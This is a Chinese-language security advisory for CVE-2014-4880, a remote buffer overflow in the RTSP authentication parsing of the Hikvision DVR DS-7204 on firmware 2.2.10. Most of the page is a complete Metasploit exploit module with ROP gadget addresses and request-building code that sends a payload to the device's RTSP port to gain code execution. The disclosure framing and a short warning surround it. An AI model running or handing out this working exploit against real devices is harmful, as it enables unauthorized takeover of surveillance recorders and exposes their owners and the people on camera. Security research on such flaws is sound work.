Hikvision DVR DS-7204远程缓冲区溢出漏洞(CVE-2014-4880)
Hikvision DVR DS-7204远程缓冲区溢出漏洞(CVE-2014-4880)
发布日期:2014-11-24
更新日期:2014-11-27
受影响系统:
hikvision DVR DS-7204 2.2.10
描述:
BUGTRAQ ID: 71300
CVE(CAN) ID: CVE-2014-4880
Hikvision DVR DS-7204是硬盘录像机产品。
Hikvision DVR DS-7204(固件版本2.2.10)在RTSP请求基本身份验证解析代码的实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响设备上下文中执行任意代码。
<*来源:Mark Schloesser
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the RTSP request parsing
code of Hikvision DVR appliances. The Hikvision DVR devices record
video feeds of surveillance cameras and offer remote administration
and playback of recorded footage.
The vulnerability is present in several models / firmware versions
but due to the available test device this module only supports
the DS-7204 model.
},
'Author' =>
[
'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-4880' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
],
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Privileged' => true,
'Targets' =>
[
#
# ROP targets are difficult to represent in the hash, use callbacks instead
#
[ "DS-7204 Firmware V2.2.10 build 131009", {
# The callback handles all target-specific settings
:callback => :target_ds7204_1,
'g_adjustesp' => 0x002c828c,
# ADD SP, SP, #0x350
# LDMFD SP!, {R4-R6,PC}
'g_r3fromsp' => 0x00446f80,
# ADD R3, SP, #0x60+var_58
# BLX R6
'g_blxr3_pop' => 0x00456360,
# BLX R3
# LDMFD SP!, {R1-R7,PC}
'g_popr3' => 0x0000fe98,
# LDMFD SP!, {R3,PC}
} ],
[ "Debug Target", {
# The callback handles all target-specific settings
:callback => :target_debug
} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2014'))
register_options(
[
Opt::RPORT(554)
], self.class)
end
def exploit
unless self.respond_to?(target[:callback])
fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
end
device_rop = self.send(target[:callback])
request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
request << "CSeq: 7\r\n"
request << "Authorization: Basic "
request << rand_text_alpha(0x280 + 34)
request << [target["g_adjustesp"]].pack("V")[0..2]
request << "\r\n\r\n"
request << rand_text_alpha(19)
# now append the ropchain
request << device_rop
request << rand_text_alpha(8)
request << payload.encoded
connect
sock.put(request)
disconnect
end
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def target_ds7204_1
# Create a fixed-size buffer for the rop chain
ropbuf = rand_text_alpha(24)
# CHAIN = [
# 0, #R4 pop adjustsp
# 0, #R5 pop adjustsp
# GADGET_BLXR3_POP, #R6 pop adjustsp
# GADGET_POPR3,
# 0, #R3 pop
# GADGET_R3FROMSP,
# ]
ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")
ropbuf[12,4] = [target["g_popr3"]].pack("V")
ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")
return ropbuf
end
# Generate a buffer that provides a starting point for exploit development
def target_debug
Rex::Text.pattern_create(2000)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
end
建议:
厂商补丁:
hikvision
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.hikvision.com/en/products_show.asp?id=506
本文永久更新链接地址:
评论暂时关闭